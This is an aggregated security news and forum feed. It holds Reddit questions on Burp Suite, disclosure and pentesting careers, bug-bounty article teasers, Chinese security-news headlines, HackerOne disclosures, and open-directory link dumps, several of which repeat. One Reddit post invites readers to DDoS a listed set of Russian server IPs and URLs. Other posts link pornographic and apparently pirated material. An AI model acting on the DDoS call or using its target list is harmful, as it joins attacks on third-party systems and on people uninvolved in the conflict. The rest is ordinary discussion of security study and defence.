    Hi, I am exploring Burpsuite and HTTP requests. I was convinced that a cookie was only set after login. I tried to intercept a (failed) login on a simple web form and I got this: POST / HTTP/1.1 Host: markup.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://markup.htb Connection: close Referer: http://markup.htb/ Cookie: PHPSESSID=33foj37c9f8tburjbdufbtu8ln Upgrade-Insecure-Requests: 1 username=test&password=test I noticed that Cookie header is already present, even before my request can reach webserver. Can someone enlighten me on this ? Thankyou!! submitted by /u/g-simon [link] [comments]
    I found a major security flaw in Lens.com website, need advice on how to proceed
    I apologize if this is the wrong place to ask this question but here goes. Without getting into details I found a way to access a user account without permission. I submitted it to kb.cert.org (didn't know where else to submit it) but they said they don't handle issues with live websites, I also informed Lens.com but honestly they didn't seem to care and have since ghosted me. I don't want to release the details and risk the (I can only assume) 7 people who still use that terrible site but I'm not sure how else to bring enough attention to this to get them to fix it. Any advice? Thanks. submitted by /u/AngryHumanoid [link] [comments]
    Providing SSN over voicemail for employer to access fingerprinting results? is it safe? Says she will delete the voicemail when her meeting sends.
    Ends* not sends, typo. I got fingeprinted for background check (im working in education, working at a private school) and have to tell my ssn to employer so they can log in database to check the fingerprint results before i start. Im not comfortable providing my SSN over email and one of my employers told me that was okay and i can give the employer in charge of it a call. I emailed the employee and she told me that she will be in a meeting until the day ends and if i could leave my SSN through voicemail and she will delete the message once the meeting is over and will run the ssn through the database. she told me she couldnt do tommorow since she was leaving out of country and i need to give it before monday on the day i start to have results checked is this safe to leave a voicemail with my ssn since though she will delete it afterwards? seems it my only option or should i just forget this job altogether if this is my only choice or request someone else who is available to do it with? i think she is the only one..... update : i decided to do it since time was ticking since i start Monday and the employer is off to another country tomorrow so i wont be able to connect with her, which i find very weird. Did i put myself at risk?? probably. Did i feel immediate regret after doing it? Yes i did. nervous as heck, i hope i will be fine after this. submitted by /u/lostspirit10 [link] [comments]
    RSA Netwitness
    Hi guys, I recently started working as QA in NW and wanted to check what folks on field actually think of it. Have you ever tried or had hands on with RSA Netwitness SIEM? Any feedback on UX, Threat hunting, correlation capabilities etc? Thanks! submitted by /u/Peanutbutter-0 [link] [comments]
    Is this tool worth it ?
    I've been following these guys for quite some time now, since a friend of mine working at a large insurance company told me they use the platform internally. But I'm still not sure whether it is worth it. A few days ago, they announced they went open-source, I gave it a try and it looks cool. I run a network scan with multiple tools at the same time(nmap,tsunami,nuclei) and got back a full report with just a few commands. ​ The thing is am still confused, on the difference between the open source and the payed version. Have you tried the platform before ? Do you think it is worth the money? submitted by /u/deadlyhayena [link] [comments]
    Anyone know about difference between BGP and DNS communication?
    Hi guys, i'm student in software engineer major these days, i'm interested in RPKI hijacking. I saw the news that by BGP hijacking, cryptocurrency is now in danger. As far as i know, RPKI is the certificate of the Router, and without RPKI risk of BGP hijacking is more dangerous. But, I can't understand the difference between BGP and DNS communication. Of course i did searching in google, but it is too deep for me to understand. Please teach me the difference between BGP, DNS communication easily...(to the point whre newbies can understand) submitted by /u/Late_Ice_9288 [link] [comments]
    vulnerable?
    Hi guys, how do I find out whether my own ip address is vulnerable atm ? submitted by /u/alicia30765 [link] [comments]
  • Open

    How i Found Single click open redirect at xiaomi ( Arabic )
    Single click open redirect السلام عليكم , اليوم بكتب لكم عن كيف حصلت ثغرة Continue reading on Medium »
    How I Hacked the Dutch Government with SQLi and Won the Famous T-Shirt?
    Hello, those who are at the computer day and night. Continue reading on Medium »
    Take part of our Bug Bounty Program ‍
    As you well know Avacash.Finance is a fork of Tornado.cash in the Avalanche Blockchain, which means that we offer a fully decentralized… Continue reading on Medium »
    Mars Protocol offers up to $1 million payout in bug bounty program with Immunefi
    More than 20 contributors from around the world have spent nearly a year developing Mars from scratch in the Rust programming language… Continue reading on Medium »
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    Hey Readers 👋, Hope you are doing great, Continue reading on InfoSec Write-ups »
  • Open

    ODs/Calibre servers from Russia
    In solidarity with ukrainian people, after the cyber attack of russian goverment against ukrainian digital assets to prepare their invasion, you're friendly invited to attack these servers located in Russia unto DDOS. Help us to complete this list : ODs https://julia.paimon.pro/ https://91.240.125.178/ http://files.net57.ru/ http://b1.artplanet.su/ http://5.56.134.67:8080/ http://178.140.239.157/ http://91.214.68.245/ http://212.109.223.247:9000/ http://188.226.41.25/ https://109.194.141.225/ http://5.8.64.57/ https://45.84.225.49/ http://195.218.199.70:8888/ https://193.106.132.50/ http://195.93.160.105/ http://109.200.155.175/ http://176.193.170.202/ http://141.101.188.153/ http://80.78.193.77:8080/ Calibres http://87.117.1.35:9191/ http://90.188.92.137:8080/ http://37.143.24.7:8080/ http://89.111.132.113:8180/ http://80.234.32.202:8888/ http://176.12.99.146:8123/ http://136.169.223.16:8080/ https://195.91.231.203:8443/ I hope the Russians love their children too ! Slava Ukraine ! ​ https://preview.redd.it/h44axndgquj81.jpg?width=281&format=pjpg&auto=webp&s=ea63007f203cd1f7fe4bd3c434620b969861e464 submitted by /u/krazybug [link] [comments]
    Diff links to other places, funny music ect...
    Ok went for a wander and here are a few findings not claiming they are all new but just what I found on a rabbit hole day... https://www.pyrocam.com/files/Video/funny/ next... http://stephenleblanc.com/backup/stephen/projects/Alex%20recovered/BlackBerry/music/Media%20Sync/ next... http://ftp.dyslexicfish.net/music/ next http://mediamusic-journal.com/video/ next https://www.creativebone.co.uk/video next... http://projects.csail.mit.edu/video/history/robotics/ ​ cannabis stuff plus other... https://www.thevespiary.org/library/Files_Uploaded_by_Users/llamabox/ ​ Sounds language stuff... http://211.110.1.18/Suda_Data/ ​ cooking http://www.medigaplife.com/videos/recipes/ ​ Funny's old but still funny gif jpg ect... http://www.brainbox.cc/funny/ ​ Memes what was relevant then... http://www.mercilesstruth.com/memes/ ​ Funny yep just funny, some old chan stuff, vids evt... http://tajgoren.net/bildarkiv/Download/ http://tajgoren.net/bildarkiv/Download/Funny/ ​ Well movies music'ish just stuff... https://johnbot.org/Share/ ​ Lots of images. Stay out of the folder WTF... http://148.72.150.188/archive/access/images/ ​ Images funny'ish do not watch 'SickBoobie Choumi.wmv' http://www.amickracing.com/misc/ ​ Funny, music. MP4s and lots more... http://www.aircam6600.com/1/mp4/ ​ Ok well done if you got through them. You saw the hidden link...;0) submitted by /u/xanderTgreat [link] [comments]
    Just a few xxx links for now...
    Lots of xxx movies https://artserotica.com/videos/ Been posted before but still up http://salepute.fr Short Jav I think some pixelated... https://www.xxxx-videos.com as above... https://kijyoui-douga.com/wp-content/uploads/2017/07/?SD Jav as above http://javichuparadise.com/wp-content/videos/ Not sure if this meets the open directories guides... http://www.wo-fd.xyz/?/ Lots of images with a few vids... http://real-uksex.com/wp-content/uploads/ Lots of MP4's http://24.138.249.6/Peliculas/Adultos/ What it says in the link Mandy Flores porn life images... https://mandyflores.com/content/ Bit of good old BDSM http://213.32.1.25 submitted by /u/xanderTgreat [link] [comments]
  • Open

    The Top-Notch Red Team Penetration Testing Services in Israel, USA, UK
    Continue reading on Medium »
  • Open

    Dispatch From The Digital Fringes (01.022022)
    Welcome to our launch here on Medium! I’m Matt Schultz — former Digital Archivist, Curator & Preservationist. I’m so excited to be… Continue reading on Medium »
    The ultimate guide to threat intelligence for corporate security
    This definitive guide to threat intelligence provides everything you need to know about implementing and using threat intelligence within… Continue reading on Medium »
  • Open

    SecWiki News 2022-02-24 Review
    针对AD CS中ESC7的滥用 by ourren 威胁情报的三个准确定义 by ourren Leveraging machine learning to find security vulnerabilities by ourren 移动互联网应用供应链(SDK)行为安全性现状研究报告 by ourren 基于BERT的Web服务政策合规性衡量方法 by ourren LastPyMile - 甄别软件包源代码和发布版代码的差异性 by ourren 基于机器学习的安全数据集总结 by ourren Xloader 是如何进行加密 C&C 通信的? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-24 Review
    针对AD CS中ESC7的滥用 by ourren 威胁情报的三个准确定义 by ourren Leveraging machine learning to find security vulnerabilities by ourren 移动互联网应用供应链(SDK)行为安全性现状研究报告 by ourren 基于BERT的Web服务政策合规性衡量方法 by ourren LastPyMile - 甄别软件包源代码和发布版代码的差异性 by ourren 基于机器学习的安全数据集总结 by ourren Xloader 是如何进行加密 C&C 通信的? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
    SockDetour is a custom backdoor being used to maintain persistence, designed to serve as a backup backdoor in case the primary one is removed. The post SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors appeared first on Unit42.
  • Open

    Zero-day XSS vulnerability in Horde webmail client can be triggered by
    Article URL: https://portswigger.net/daily-swig/lt-p-gt-zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function-lt-p-gt Comments URL: https://news.ycombinator.com/item?id=30453652 Points: 2 # Comments: 0
  • Open

    离职后,你会访问前公司账户吗?
    合理的离职流程可以减少离职员工危害前雇主。
    FreeBuf早报 | 美国受到勒索软件警告;乌数百台计算机遭wiper恶意软件攻击
    一名尼日利亚国民在纽约南区地方法院承认侵入一家公司账户并窃取工资存款。
    俄罗斯闪战乌克兰,网络战早已打响
    俄乌冲突持续发酵已久。
    2021社交媒体攻击又创记录,金融安全仍在榜首
    社交媒体已成为黑客分发威胁渠道之一,在整个2021年这个渠道的攻击次数增加了两倍。
    支付赎金后勒索软件勒索并未停止
    一项关于勒索软件受害者经历的全球调查强调了勒索软件参与者缺乏可信度,因为在大多数支付赎金的情况下,勒索仍在继续。
    3月11日晚19点 | 安全基建下,如何建设资产识别能力
    3月11日(周五)晚上19:00,阿里巴巴集团安全部高级安全专家-阿刻将为我们带来主题为《新安全基建下,如何建设资产识别能力》的公开课。
    华硕子公司ASUSTOR遭攻击,被勒索上千万元赎金
    此次勒索攻击波及全球众多用户,并在ASUSTOR论坛上引起来广泛讨论。
    数据中心基础设施的运维与管理
    为规范数据中心基础设施的运维管理,各企事业单位应参照相关国家标准建立运维管理体系、制度、流程等措施,保证信息化业务安全、稳定、正常运行。
    利用撞库攻击,一尼日利亚黑客将他人工资据为己有
    从2017年7月开始,攻击者累计入侵了5500个用户账户,总共转移了80万美元。
    安全第一季-【事无小事安全先行】
    病毒是一种暗中感染计算机系统并进行破坏的程序。病毒代码潜藏在其它程序、硬盘分区表或引导扇区中等待时机
    微软洞察:身份管理漏洞成为数字安全首要威胁
    过去两年,疫情影响下的新常态加速了全球范围内的数字化转型,数字化能力已经成为企业与个人生存与发展的核心能力。
    网络犯罪案例分析-非法获取APP数据(四十二)
    为牟私利,非法获取APP数据,构成非法获取计算机信息系统数据罪,判处有期徒刑四年六个月。
    不可见,无安全!值得关注的十大国外SASE厂商(2022版)
    传统的网络安全防护措施将不能够满足复杂的网络架构,提升网络可见性将是未来网络安全防护技术的重要发展趋势。
    大和证券(中国)招聘了!信息安全管理岗等你来投
    大和证券(中国)有限责任公司是一家落户中国北京的新设外资控股证券公司。
  • Open

    Знакомство с Fuzzing в Go
    В релизе 1.18 будет добавлена поддержка fuzzing. Continue reading on Medium »
  • Open

    Знакомство с Fuzzing в Go
    В релизе 1.18 будет добавлена поддержка fuzzing. Continue reading on Medium »
  • Open

    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
  • Open

    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...

  • Open

    [NSFW] Pornographic Images
    Public nudity - enjoy https://public.flashingjungle.com/exhibitionism/ submitted by /u/-Phinet- [link] [comments]
    DorkSearch is a tool that gives you a list of prebuilt templates for Google Dorks for different use cases.
    submitted by /u/pentestscribble [link] [comments]
    Hollywood Movies 1900-2020 - If download is slow, cancel and try again after 30 seconds.
    submitted by /u/SatansMoisture [link] [comments]
    Bit more porn...
    This site I have already ripped and made into torrent but it's still up... itaporno Remember use a VPN if you rip it... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Looking for Place to Find latest Computer Forensic Case News
    I'm currently enrolled in a Digital Forensics class and have to do a project where we do a presentation on a current technology or case in Digital Forensics. Anybody know of a good way to find these articles, like what to put in the search bar or what websites to best check out? submitted by /u/Mattdarkninja [link] [comments]
    Windows 10 reset artifacts
    Can someone help me to find traces of artifacts left on windows 10 machine which has been reset 5 months back and repurposed to another user? A reference material on finding windows 10 reset and refresh artifacts will be very useful. Also, suggestions on any tool that can be used to recover data. submitted by /u/Pepperknowsitall [link] [comments]
    Putting user behind keyboard/knowledge
    If files are found automatically synced to a computer, no evidence that suspect had knowledge of them (folder never opened, file never viewed)… also the file was not downloaded by any deliberate action. Cannot determine who uploaded them in the first place or device used to do so Is it enough to make a case based on name on the account when multiple individuals reside at a place? submitted by /u/Complete-Cockroach80 [link] [comments]
    Newcomer to the field
    If this post is against rules in any way I apologize and please take it down.| Greetings everyone. I graduated last year and got my bachelors in digital forensics and decided to stay in my country for a while and try to get a job here (Puerto Rico). Sadly I have not and am considering moving to the US and get a job there. Any advice? Sites to search for job offers for this area for graduates? States I should stay away from because of high cost of living? Any help I would appreciate greatly. submitted by /u/andrew9514 [link] [comments]
  • Open

    Automating bug bounties
    submitted by /u/pedro_benteveo [link] [comments]
    The vulnerability research team @GitLab is introducing an open-source community-driven advisory database for third-party security dependencies
    submitted by /u/howie1001 [link] [comments]
    Remote Code Execution in pfSense <= 2.5.2
    submitted by /u/smaury [link] [comments]
    tmp.0ut Volume 2
    submitted by /u/VVX7 [link] [comments]
    You can still CSRF POST requests under the default browser SameSite cookie policy. How to jump through the required hoops.
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    submitted by /u/Neustradamus [link] [comments]
  • Open

    Bug Bounty: Do You Need To Be A Programmer?
    Disclaimer: we are talking about the research of web applications only. Continue reading on Medium »
    Beginner Bug Bounty Journey
    # Introduction Continue reading on Medium »
    What You can Learn from Coinbase Hack with USD250k Bounty
    As a bug bounty hunter, you may experience something like below: Continue reading on Medium »
    How to hunt for bug bounties
    The first step when looking for bug bounties is to get to know the target. Continue reading on System Weakness »
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Never attended a virtual networking event before? Your FAQs answered + Check our live demo here. Continue reading on InfoSec Write-ups »
  • Open

    How to use satellite imagery to visualise changes in landscapes
    And how those changes can help you chronolocate an event. Continue reading on Medium »
    Geolocating TikTok videos of Russian military vehicles near Ukraine
    A little persistence can help pinpoint locations Continue reading on Medium »
    Bus and Rocks— OSINT Challenge 19 and 20
    Quiztime (contributor @kollege and @mahrko) shared two OSINT quizzes with us. Both objects were kind of wired. For kollege's we have to… Continue reading on Medium »
  • Open

    Pentesting a windows box
    Hello everyone! Just a question how do you start a windows box? I am doing some HTB this past few weeks and only testing the linux boxes, now how you guys learned to pentest a windows box? (I dont have any background on ActiveDirectory stuffs) Thank you! submitted by /u/pldc_bulok [link] [comments]
    Implications of disabled, factory install of Facebook on Android device.
    I do not use Facebook ,but it came pre-installed on my phone. I can't uninstall it because Zuck owns my phone, but I have disabled the app and reverted it to the original factory install. I'm concerned about having an extremely out-of-date version remaining, probably rife with security flaws. Does Disabling the app effectively lock it out from receiving or transmitting? submitted by /u/spinfip [link] [comments]
    Email compromised, address spoofed, or elaborate phishing email?
    Not sure if this is the best subreddit to ask about this. Let me know if there's a better subreddit for this post. My email account has a unique, very strong password and two-factor authentication. This morning, I noticed in my junk folder there was one of those "failed to deliver" emails meant for another address, like those undeliverable emails when you get when you try to email an address that doesn't exist and it bounces back to you. Interestingly, it came from another domain instead of postmaster@outlook. I never sent this email, I don't see an email like it in sent, and I don't see anything unusual in drafts or sent. I checked the account's login activity and there were no sign-ins, only failed attempts to sign into the account from Asia. I have 2FA enabled so I should've been notified if anyone had attempted to sign into the email account, either today or previously at any point other than when I myself signed in. Furthermore, the bounce back email had my address as the sender, but the contact name on it was just random letters, not my name that I have on my account. Is my email compromised, did someone spoof the address, or is this an elaborate phishing attempt that I'm BCC'd on? submitted by /u/NotMSUPD [link] [comments]
    PluralSight Subscription Expiring, Any Others We Should Look Into Instead?
    After being unemployed for 2 years(stay at home dad) I wanted to rejoin the workforce but wanted to move past helpdesk/desktop level(had 5yrs exp) and decided Cybersecurity was the way to go. I did not have a tech degree, or any other certs and was always a poor student, but I studied my butt off for 2 months and got my Sec+ and a month later landed the dream job making the big bucks!!! aka INFOSEC focused sys admin. Our PluralSight subscription is expiring and before I blow my budget on it and renew it, I wanted to know if there are any others I should be looking into instead? This would be for a team of 2-4 individuals. Ideally looking for an all around system, with the focus on Cloud, INFOSEC, and SCCM. In my current duties I touch everything, SCCM, AWS, Azure, GCP, VmWare, Citrix, C…
    Using Quantitative Risk Metrics to get Csuite buy in?
    When I did my Master's we did a great section on quantitative vs qualitative risk management that I really want to implement. The logic to me seems sound in that a value of asset x should inform the costs you are willing to incur to mitigate risks. Getting away from vague "I feel" statements about cyber risk to quantitatively say asset x is worth y to the company so investing w to reduce risk is basic math the c-suite can get. My barriers to this are: Getting an effective asset valuation as no one seems to track initial investment and sustainment costs let alone cyber security costs. Building this into SOP when tagging assets. Tagging right now is limited so this needs to be fixed too. Anyone here effectively put in quantitative risk practice that can share what worked? submitted by /u/finnthethird [link] [comments]
    what's the deal about ip addresses?
    I know this is so fundamental basic stuff but why is this thing so crucial/ submitted by /u/alicia30765 [link] [comments]
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bash Tricks for Command Execution and Data Extraction over HTTP/S
    submitted by /u/cyberbutler [link] [comments]
    What’s Next in Microsoft Sentinel?
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-23 Review
    Bvp47 美国NSA方程式的顶级后门 技术细节 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-23 Review
    Bvp47 美国NSA方程式的顶级后门 技术细节 by ourren 更多最新文章,请访问SecWiki
  • Open

    Deliviry Club Courier app (v. 3.9.25.0); Disclosure phone number of client.
    Mail.ru disclosed a bug submitted by 388: https://hackerone.com/reports/1382570 - Bounty: $150
    Add upto 10K rupees to a wallet by paying an arbitrary amount
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1408782 - Bounty: $2000
    Incorrect authorization to the intelbot service leading to ticket information
    TikTok disclosed a bug submitted by johnstone: https://hackerone.com/reports/1328546 - Bounty: $15000
  • Open

    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
  • Open

    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
  • Open

    Types of attacks I have learned
    Man in the middle attack Continue reading on Medium »
  • Open

    研究显示,高速增长企业伴随着更高的黑客风险
    根据美国无密码身份平台提供商Beyond Identity的最新研究显示,相比于增长率平缓的公司,高速增长的公司遭遇网络安全漏洞攻击的可能性更大。
    2021年91%的英国组织遭到邮件钓鱼攻击
    根据Proofpoint的2022年网络钓鱼情况报告,去年,超过十分之九(91%)的英国组织被邮件钓鱼成功入侵 。
    这样的钓鱼邮件,你会中招吗?
    钓鱼邮件无处不在,如何防范可得擦亮眼睛。
    注意,谷歌MFA验证拦不住这类网络钓鱼攻击
    一种新型的网络钓鱼攻击却可以绕过MFA,攻击者利用VNC屏幕共享系,让目标用户直接在攻击者控制的服务器上登录其帐户,因此可绕过MFA。
    倒计时15天!CIS2021 Spring·春日版直播邀您线上相聚
    3月9日,让我们相约线上直播,不见不散~
    FreeBuf早报 | DDoS攻击在 2021 年呈螺旋式上升;Sea Mar被控数据泄露疏忽
    Neustar Security Services 发布了一份报告,详细介绍了 2021 年网络攻击的持续增长,其中DDoS 攻击数量空前。
    电信诈骗黑灰产业链现状(三):免签、代收、代付技术成诈骗主流洗钱方式
    虚假网赚、虚假投资等诈骗场景中,受害人之所以轻易相信对方,缘于骗局早期,能够获得骗子返回的任务佣金。
  • Open

    Rust Related CVE Entries
    Article URL: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rust Comments URL: https://news.ycombinator.com/item?id=30438575 Points: 2 # Comments: 0
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    Article URL: https://www.cyrusimap.org/sasl/sasl/release-notes/2.1/index.html#new-in-2-1-28 Comments URL: https://news.ycombinator.com/item?id=30435871 Points: 1 # Comments: 0

  • Open

    Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis
    Recommendations on how to proactively prepare to defend against the potential cyber impact of the escalating Russia-Ukraine crisis. The post Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis appeared first on Unit42.
  • Open

    Best CS undergrad programs for a prospective pentester?
    Wondering if anyone here can speak to which college CS programs best prep their students to take on pentesting. I'd prefer a program that focuses on getting me the skills I need to understand the computer and just to give me general depth in my field. I know pentesting is what I want to do professionally, so something that would let me focus on that is preferable. submitted by /u/NotVeryMega [link] [comments]
    Is it possible I could be targeted?
    Kinda what the title says. I started out this morning with the ability to call out. Then my phone just started hanging up instantly. Put Sim in different phone, same thing. Tried calling it, straight to voicemail. Went to Walmart to get a new sim and phone number. Got ten minutes of the ability to make calls, then the same exact thing. Got a new phone, different carrier. Same thing ten minutes, then no more voice ability. Could it be possible some one put out some kinda hit on me? submitted by /u/YddishMcSquidish [link] [comments]
    How much day rate for pentester contractors in the UK?
    Due to an increase surge of work of a new contract, my company needs penetration tester contractors which would be good to use on an ad-hoc basis. What are the typical rates for pentesters and how long do a typical contract go on for? E.g. £500 a day for 3 months for example for someone with 3-5 experience. Is this reasonable pricing? I have been asked to find ones in the UK due to familiarity with certain frameworks like cyber essentials and CREST. It would be great if someone can share some figures so I can know what to expect with varying experience and qualification such as CRT and CCT as well. Thank you. submitted by /u/HamsterMoisture [link] [comments]
    EDR etc for ONE linux box?
    What setup/software/etc do you recommend to protect my personal linux computer? E.g. vectors I see: it could get pwned by malicious python packages, malicious VSCode extensions, malicious NPM etc. Less likely: Browser exploits. I was experimenting with only letting my browser phone out (the usual malware on linux just connects out naively). But then I have to open everything up again to install stuff. ClamAV is a joke, but something like carbon black makes no sense for a single box. Ideas? submitted by /u/medusabadhairday [link] [comments]
    SIEM Onboarding for IaaS/PaaS over Azure/AWS
    As someone who has been witnessing quite an amount of transformation across all sectors. Have been wondering what are the improvements Vendors and OEMs have made on SIEM Onboarding front. Do OEM/Vendors still prefer/recommend syslog, installing proprietary agents or the oh so obsolete RPC(for Windows) to onboard systems or have some vendors/OEMs also started pushing for cloud native solutions like Event Hub/SQS. A lot of vendors do show greenlight on integration with S3/Event Hub but dont support any sort of parsing for these log sources (Windows and Linux), one cannot expect anyone to actually create parsers from scratch for the entire Windows Ecosystem. As large orgs start deploying Control Towers with dedicated logging buckets anyone can poll off and ingest, how do you guys scale your SIEM deployments and utilize these architectural changes ? submitted by /u/w33ha_AD [link] [comments]
    Where to turn on VPN (laptop vs phone) when hotspotting my phone
